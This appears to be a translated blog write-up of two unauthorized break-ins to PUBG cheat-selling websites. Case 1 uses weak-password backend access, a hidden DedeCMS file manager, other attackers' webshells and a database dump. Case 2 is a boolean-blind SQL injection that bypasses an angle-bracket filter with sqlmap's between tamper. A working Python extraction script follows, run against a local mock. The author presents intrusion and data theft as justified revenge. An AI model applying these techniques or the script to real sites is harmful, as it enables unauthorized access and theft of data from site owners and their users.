Title: Pentest cases: hitting PUBG ("chicken-eating") cheat-selling sites


1. Case 1

Because I got beaten by a cheater recently, I am planning to let those cheaters feel what it is like to be shut down (自闭). Last night I crawled nearly 1,000 sites selling PUBG cheats.

Cheat sellers: when I have time I will hit you one by one.

I found that most of them run an ASPX application. Unfortunately, without the source there is no white-box audit, and black-box testing turned up no holes.

So I could only pick the easy targets (soft persimmons), and I hammered four of them in one go last night.

Almost all of them run BT panel (宝塔).

Still, the php-venom 4 series and its companion encoder turned out to be stable against BT panel.

Dumped the database (脱裤) and found 4,000+ records inside.

Hit another PUBG cheat site tonight.

Unfortunately, and embarrassingly, there is no write permission.

So here is a rambling write-up (水文).

1. Getting into the backend, nothing special

This should count as a promotional site; there is nothing on it except marketing content.

Whatever it is, just do it.

I took a look: it is a DedeCMS (织梦) site with custom secondary development.

Getting into the backend was easy; everyone here knows what that means.

2. A mysterious (玄学) backend

I found that the backend had many functions removed, especially the DedeCMS file manager.

But in my experience, many of these customized builds do not really delete the editor; they just stop showing it on the backend pages.

Open the browser's element inspector.

Find any link and change its target to media_main.php?dopost=filemanager.

Click it, and the file manager page appears.

Upload a shell.

I thought it would end there.

It turned out that although the upload reported success, nothing landed.

I thought it was a WAF, so I switched to a harmless JPG, and that would not go up either.

Then I thought it was a directory permission issue.

Found the session temp directory and tried uploading there; still no.

No screenshot of that, but nothing could be uploaded.

So maybe the entire site has no write permission.

Tried the delete function and found that I can delete files.

emmmmm, so is there permission or not?

Generally, if you have no write permission you have no modify permission, which means no delete permission either.

Wondering whether the upload function was simply broken, I changed the approach to getshell.

3. When getshell fails, the first thing that comes to mind is modifying an existing file and putting a shell in it

It showed "csrf token is wrong".

Searched for how to solve it.

Found the answer: edit the check function directly and add a return as its first statement.

As a result, the same error popped up when modifying config.php.

So I was stuck in a loop.

Changing a template tag gives the same error.

Then I tried each of the DedeCMS 0days that execute arbitrary code from the backend.

The prompt said execution succeeded, but the result was either a 404 page or the csrf token error.

Why does the CSRF token check always fail? I have never run into this before. Did I do something wrong?

If any of you big brothers (表哥) know why, please tell me, thanks.

4. Getshell at last. I had originally been puzzling over it, then went out for a meal.

Then I wondered: since it was a weak password, would someone else's backdoor already be there?

I remembered that DedeCMS has its own backdoor detection and removal function.

Same trick with the element inspector: find the backdoor scan function and start scanning.

Sure enough, suspicious files were found.

Then I saw that they were all other people's backdoors.

Pick any one and connect to it.

5. In the end I found it was a Xingwai (星外) virtual host, and the whole site has no write permission, so no wonder nothing could be uploaded.

After flipping through the directories: no cross-site access, no write permission, no way to bypass disable_functions.

It is as if there is nothing to do.

But magically, you can delete any file.

I will not delete the site; keeping the evidence.

2. Case 2

First, open the website and we can see its cool interface.

A heartwarming announcement.

Shameless promotional copy.

1. Finding the injection

Built on ThinkPHP 3 (tp3), backend at /admin.

Tried a "universal password" (万能密码, an SQL-injection login bypass string).

Prompted "wrong password".

Tried admin / admin888 and it prompted "account does not exist".

The two responses differ, so there may be injection.

2. Capture the request with Burp and send it to Repeater for further testing

Returns status: -2 when the condition is true and status: -1 when the condition is false.

This further confirms the guess: the backend login is injectable.

Threw it at sqlmap.

No injection detected; just a pile of 404 Not Found.

At first I thought the CDN was blocking sqlmap's traffic, but later found there was no protection at all. A fake CDN.

So consider that the CMS may be filtering something.

3. Bypassing the filter. After testing, a 404 is returned whenever angle brackets appear.

BETWEEN can be used to bypass that.

Then continue with the earlier observation: condition true = -2, condition false = -1.

The conditions for boolean-based blind injection are met.

Suddenly I realized this is the same situation as the injection challenge in the 第五空间 CTF finals.

True returns one page, false returns another, a filtered character returns a third page, and BETWEEN bypasses the filter.

CTF really does not lie to me.

So just add --tamper=between to the sqlmap parameters.

4. Finally

The administrator password in the database is AES encrypted; without the key it cannot be decrypted.

The ordinary-user login entry is closed, so there is no registration or login.

Nothing else to gain, apart from dumping the information of those orphans (孤儿, the cheat sellers).

Packed up the evidence and submitted it to the relevant authorities.

Reprinted from the original link: https://mp.weixin.qq.com/s/Bms1EPvpb1S7sU2KQX8ctA
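The Case 2 injection, as an added worked example that is not code from the original post: a Python model of the login oracle described above (status -2 when the condition is true, -1 when false, 404 whenever the input contains an angle bracket), the rewrite that sqlmap's between tamper applies so that no angle bracket reaches the server, and a boolean-blind binary search that extracts the admin password through that oracle. Everything about the target is a constructed assumption: the in-memory SQLite table, its single admin row, the sample password value, the numeric status codes (the real site returns them inside a JSON body) and the `x' OR ... -- ` payload shape. Because the stand-in backend is SQLite, the string functions are LENGTH/SUBSTR/UNICODE; on the MySQL behind a ThinkPHP site they would be LENGTH/MID/ORD.

```python
import re
import sqlite3

# Constructed stand-in for the cheat site's login handler: an in-memory SQLite
# table with one admin row. The password value is a made-up sample (assumption:
# a 32-character hex string, the length of an md5 or a hex-encoded ciphertext).
SAMPLE_ADMIN_PASSWORD = "5f4dcc3b5aa765d61d8327deb882cf99"

_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
_conn.execute("INSERT INTO admin VALUES (1, 'cheatadmin', ?)", (SAMPLE_ADMIN_PASSWORD,))

# The observed filter: any '<' or '>' in the request yields a 404 page.
FILTERED_CHARS = re.compile(r"[<>]")


def mock_login(username: str) -> int:
    """Model of the observed behaviour. The username is concatenated straight
    into the query (the injection). A matching row means 'wrong password'
    (status -2); no row means 'account does not exist' (status -1)."""
    if FILTERED_CHARS.search(username):
        return 404
    sql = f"SELECT id FROM admin WHERE username = '{username}'"  # injectable on purpose
    row = _conn.execute(sql).fetchone()
    return -2 if row else -1


def between_tamper(payload: str) -> str:
    """Simplified version of the rewrite in sqlmap's tamper/between.py:
         A > B  ->  A NOT BETWEEN 0 AND B
         A = B  ->  A BETWEEN B AND B
    Afterwards the payload contains no angle brackets. (The real tamper is
    more careful about operands; this one assumes operands have no spaces.)"""
    payload = re.sub(r"(\S+)\s*>\s*(\S+)", r"\1 NOT BETWEEN 0 AND \2", payload)
    payload = re.sub(r"(\S+)\s*=\s*(\S+)", r"\1 BETWEEN \2 AND \2", payload)
    return payload


def untampered_probe() -> int:
    """What sqlmap saw without the tamper: the '>' trips the filter -> 404."""
    return mock_login("x' OR 1>0 -- ")


def send(condition: str) -> int:
    """Inject one boolean condition via the username field, after tampering.
    The trailing '-- ' comments out the closing quote of the original query."""
    return mock_login(between_tamper(f"x' OR {condition} -- "))


def oracle(condition: str) -> bool:
    """True if the condition held (status -2), False if it did not (-1)."""
    status = send(condition)
    if status == 404:
        raise RuntimeError("payload hit the angle-bracket filter: " + condition)
    return status == -2


def binary_search(expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], using only 'expr > mid' questions (each becomes NOT BETWEEN)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_admin_password() -> str:
    """Boolean-blind extraction of admin.password one character at a time:
    first its length, then the code point of each position (ASCII assumed)."""
    length = binary_search("LENGTH(password)", 0, 64)
    chars = []
    for i in range(1, length + 1):
        chars.append(chr(binary_search(f"UNICODE(SUBSTR(password,{i},1))", 0, 127)))
    return "".join(chars)


if __name__ == "__main__":
    print("untampered probe status:", untampered_probe())
    print("true  condition status:", send("1 = 1"))
    print("false condition status:", send("1 = 2"))
    print("extracted password:", extract_admin_password())
```

The two `send("1 = 1")` / `send("1 = 2")` probes reproduce the Burp Repeater step (-2 versus -1), `untampered_probe()` reproduces sqlmap's wall of 404s, and `extract_admin_password()` is what `--tamper=between` let sqlmap do for real. With a single admin row the `OR` makes the whole row set the oracle; against a table with several admins you would pin the row with an `id = N` clause, which the same tamper rewrites to `id BETWEEN N AND N`.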
